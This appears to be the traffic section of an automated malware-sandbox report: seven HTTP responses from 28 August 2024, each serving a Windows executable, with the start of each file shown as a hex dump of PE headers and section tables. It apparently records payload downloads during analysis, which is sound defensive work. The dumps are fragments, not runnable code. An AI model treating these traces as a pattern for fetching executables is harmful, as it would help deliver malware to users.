Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:14 GMTContent-Type: application/octet-streamContent-Length: 328232Last-Modified: Wed, 28 Aug 2024 19:58:57 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66cf8181-50228"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 56 81 cf 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d4 04 00 00 06 00 00 00 00 00 00 5e f2 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 b7 52 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 f2 04 00 53 00 00 00 00 00 05 00 42 02 00 00 00 00 00 00 00 00 00 00 00 dc 04 00 28 26 00 00 00 20 05 00 0c 00 00 00 d0 f0 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d2 04 00 00 20 00 00 00 d4 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 00 05 00 00 04 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f2 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e0 04 00 38 10 00 00 03 00 02 00 0f 00 00 06 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 7e 30 aa dd a7 42 95 cb 06 7e 16 66 63 df d6 a0 d8 12 38 7f e2 e9 9d 75 90 20 b8 08 26 b0 72 e1 93 c7 f4 8f 83 9b ac 8e 4b f5 22 59 60 5f 15 96 a3 a6 42 77 90 ef c5 6f 13 ea 52 a9 58 63 d2 60 d5 dd df 0c 0d a2 1f 28 6f 9c 85 6e a6 8e e0 fc b9 45 35 4c 60 73 b3 c3 8d 42 cf 26 f7 33 b8 6a 6d de fc 63 20 91 ed cd be 31 90 9c ff 58 e3 7a 96 6b 48 f4 6d 19 fd 4a 5b 5f 73 4e 91 f3 4f 8b cc a9 c0 16 08 57 c4 08 a6 0b bc bd 12 2f d1 8e 95 4d f3 33 9d b3 65 0c 7a 3a af d6 ba af ab 37 49 c5 79 1f 37 a8 4c 81 39 f6 f4 6f 20 c0 31 e0 19 f9 c3 3b 25 eb 01 b8 6e 7a 34 da ea 95 57 6c 45 6e 23 a5 37 4e bb 01 f0 f4 0b ea 3a 76 c0 ff 8a a5 4d 1a 19 f1 49 96 b2 04 43 b1 fd a2 88 6b bb 9d fe 7d f2 b7 c1 66 38 5c 78 ba 71 2b 5f e1 77 df 75 21 e9 81 94 62 5a 00 95 78 0b 42 b0 38 79 a1 2d 8c cd 5d 43 97 1b 34 95 a4 d1 35 0e 80 6b 9e 81 83 32 83 f7 2d db 35 50 f3 b3 b0 df db 89 f7 4e 9a 21 9b 57 25 fd f7 c8 06 6d 4
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:15 GMTContent-Type: application/octet-streamContent-Length: 196136Last-Modified: Wed, 28 Aug 2024 19:09:07 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66cf75d3-2fe28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 75 cf 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d0 02 00 00 06 00 00 00 00 00 00 5e ee 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 ad 77 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 ee 02 00 53 00 00 00 00 00 03 00 42 02 00 00 00 00 00 00 00 00 00 00 00 d8 02 00 28 26 00 00 00 20 03 00 0c 00 00 00 d0 ec 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 ce 02 00 00 20 00 00 00 d0 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 00 03 00 00 04 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 d6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ee 02 00 00 00 00 00 48 00 00 00 02 00 05 00 98 dc 02 00 38 10 00 00 03 00 02 00 0f 00 00 06 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 44 d3 a5 67 31 84 4d 3c 80 8f 5a 66 48 41 ec 5d b4 52 28 f8 87 bd a7 fe c7 d7 8f 76 ac 0c 58 37 0b 55 22 d0 37 b7 8b 2d 4f 2c 93 1d 3f 76 31 a8 83 b0 7a 11 8f a4 d2 3f 14 6c 97 0a 3e c8 b7 5e d7 10 27 10 50 4c 5e 1c 8a 6c 53 ae 0a 47 c6 63 f5 7d a5 af 50 e0 89 16 0e 80 38 b7 91 9e 6f 53 fe d6 4d de ae 16 c9 ac 5b 97 d0 bb 86 09 2d 13 1a 66 66 94 b2 63 66 bb 0b 95 48 12 c9 e7 6a c4 c7 88 c9 25 18 6e a5 92 c3 dd 1e 61 2f 3f 72 1a 52 e9 be 22 c4 19 13 ca d5 12 a0 bd fb 5d 5a 92 d4 f7 a5 6a 53 96 f1 ef 6b c3 57 ba 61 39 39 e1 d3 11 94 7c 0e 70 79 95 f8 6d c1 73 7c 81 68 85 c5 b9 ac 97 0a e6 c2 34 15 cf f0 58 37 04 a7 b6 b5 32 8d ed 9b 83 3f c5 34 50 b4 4e 15 be 12 d8 38 33 22 8e fa 70 65 e1 da 6f 02 81 c2 63 b7 96 77 74 f5 bc 6a fa d0 4c a6 5f 4b b5 af ec 17 51 40 80 15 3b 73 05 e7 d1 08 11 3f 52 4b 96 16 47 4e 00 02 26 91 63 1d ad f4 93 0f 4e 05 dc e6 13 60 a3 70 d1 32 01 1c 2b 06 59 ad 8e 45 3
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:51 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 
03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:55 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 
6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
